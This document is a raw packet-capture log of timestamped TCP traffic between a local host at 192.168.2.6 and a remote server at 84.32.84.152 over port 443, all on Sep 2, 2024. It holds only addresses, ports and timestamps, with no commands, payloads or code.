Sep 2, 2024 08:21:14.708880901 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.708887100 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708921909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708950043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708976984 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.708985090 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708998919 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709000111 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709049940 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709057093 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709103107 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709104061 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709117889 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709146023 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709156036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709197998 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709201097 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709208965 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709264040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709317923 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709364891 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709384918 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709445953 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709501982 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709548950 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709652901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709691048 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709705114 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709711075 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.709733009 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.709752083 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710123062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710175037 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710216045 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710268021 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710608959 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710639000 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710658073 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710663080 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710674047 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710681915 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710721016 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710722923 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710730076 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710768938 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710782051 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710788965 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710820913 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710830927 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710854053 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710860014 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710872889 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710881948 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710922956 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710923910 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710935116 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.710968971 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.710980892 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.711004019 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.711026907 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.711066008 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.711097956 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.711122036 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.711127996 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.711139917 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.711168051 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.712415934 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.740753889 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.740803957 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.740875959 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.740892887 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.740923882 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.740942955 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.791451931 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791496992 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791531086 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791572094 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.791574955 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791598082 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791623116 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.791667938 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791697025 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.791703939 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791713953 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.791836977 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791867018 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791877985 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.791884899 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791913033 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.791949987 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.791995049 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792002916 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792047977 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792094946 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792145967 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792268038 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792311907 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792313099 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792325974 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792362928 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792520046 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792562008 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792572975 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792578936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792594910 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792628050 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792635918 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792669058 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792678118 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792678118 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792686939 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792697906 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792710066 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792768002 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792773008 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792805910 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792893887 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792931080 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792954922 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792960882 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.792973042 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.792973995 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793014050 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793019056 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793037891 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793082952 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793085098 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793093920 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793118000 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793133020 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793140888 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793174982 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793174982 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793329000 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793364048 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793405056 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793410063 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793441057 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793447971 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793451071 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793457985 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793488979 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793498993 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793535948 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793545961 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793554068 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793586969 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793596029 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793602943 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793622971 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793633938 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793639898 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793715000 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.793726921 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.793772936 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.794009924 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.823565960 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.823612928 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.823779106 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.823798895 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.823849916 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874183893 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874231100 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874269009 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874308109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874325991 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874340057 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874367952 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874378920 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874385118 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874397039 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874438047 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874439001 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874475002 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874483109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874489069 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874514103 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874526978 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874535084 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874562025 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874581099 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874764919 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874809980 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874816895 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874824047 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874860048 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874876022 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874931097 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.874933958 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874944925 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.874980927 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875075102 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875121117 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875154018 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875201941 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875279903 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875313997 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875339985 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875349045 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875359058 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875410080 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875458002 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875464916 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875502110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875571012 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875577927 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875626087 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875636101 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875699043 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875823975 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875936031 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875977039 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.875983953 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.875989914 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876017094 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876025915 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876033068 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876065016 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876075983 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876081944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876116037 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876116991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876128912 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876159906 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876188040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876262903 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876312971 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876343966 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876384974 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876394033 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876401901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876419067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876420975 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876523018 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876529932 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876540899 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876574039 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876580000 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876602888 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876629114 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876672029 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.876677990 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.876717091 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.877034903 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.906193972 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.906285048 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.956968069 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957027912 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957067966 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957070112 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957083941 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957106113 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957114935 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957127094 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957170963 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957174063 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957185030 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957221031 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957223892 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957231998 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957262039 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957278967 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957325935 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957329035 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957338095 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957369089 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957370043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957381964 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957391024 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957416058 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957420111 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957463980 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957470894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.957509995 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.957986116 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958076954 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958086967 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958096981 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958108902 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958134890 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958179951 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958230019 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958235979 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958247900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958281040 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958287954 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958295107 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958337069 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958355904 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958401918 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958523035 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958556890 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958568096 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958574057 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958600998 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958626986 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958664894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958725929 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958733082 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958765984 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958770037 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958818913 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958826065 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958865881 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958870888 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958880901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958918095 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958926916 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.958976030 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.958982944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.959024906 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.959152937 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.959191084 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.959201097 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.959207058 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.959228039 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.959230900 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.959244013 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.959249020 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.959278107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.959291935 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.959343910 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.959428072 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.959482908 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.959526062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.959578991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.959626913 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.990108967 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.990150928 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.990171909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.990181923 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.990202904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.990222931 CEST	49744	443	192.168.2.6	84.32.84.152
